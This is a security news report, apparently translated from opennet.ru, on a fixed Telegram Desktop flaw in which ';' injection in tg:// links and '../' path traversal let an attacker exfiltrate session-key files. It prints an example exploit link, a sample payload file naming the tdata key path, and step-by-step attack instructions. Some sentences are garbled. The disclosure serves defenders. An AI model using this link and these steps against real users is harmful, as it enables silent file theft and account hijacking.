Details and exploitation method of the vulnerability (CVE-2026-107181) in Telegram Desktop, the official Telegram client for desktop systems, have been revealed. The issue stems from inadequate handling of unescaped delimiter characters in IPC commands, which allowed an attacker to transfer any files from the victim's system to themselves by clicking on a sent link, including files containing session keys that can be used to hijack a Telegram account. The vulnerability has been resolved in Telegram Desktop version 7.2.9.
When clicking on 'tg://' links, the operating system launches the associated Telegram Desktop application for this type of link. If another instance of the application is already running, the launched process sends the link to it via a socket using the IPC interface. The problem arises when the character ';' is included among the link parameters (for example, 'tg://x?a=1;OPEN…'), as the content is split and the parts following the ';' character are processed as separate commands.
The attack utilizes the OPEN command along with the URI scheme 'interpret:', which is intended for executing scripts via IPC, previously used to automatically send new releases to channels. The script specifies a predefined local file, which indicates the file sent to the channel and the channel ID. The file path to the scripts is processed relative to a service subdirectory, but due to the lack of sanitization of '../' in file paths, the attacker can access files stored outside the base directory. For example, a file can be uploaded to their Telegram group, after which they can link to that file as a script, preparing a link like:
tg://x?a=1;OPEN:interpret:../../../Downloads/Telegram%20Desktop/instructions.txt
Steps to execute the attack:
- The attacker adds the victim to their group (by default, adding requires no confirmation from the added party) and sends a text file to this group, which specifies the channel and path to the script. Telegram will save this file in a predefined system subdirectory when the victim joins the group.
channel: 2005234537
file: tdata/D877F783D5D3EF8Cs - The attacker sends the victim an innocuous-looking link to their host (for example, 'https://coolsite.org'), which, when opened, redirects to server the attacker is replaced by a URI of the form 'tg://x?a=1;OPEN:interpret:…;OPEN:interpret:….'
- When the link is clicked, the browser invokes the URI handler 'tg://', which triggers the aforementioned command execution sequence, resulting in the sending of files to the attacker's channel without any notifications or confirmation prompts.
- After receiving files from the tdata subdirectory with encryption and authorization keys, in the absence of a local password set by the user, the attacker can clone the victim's connection session on their device.
Source: opennet.ru
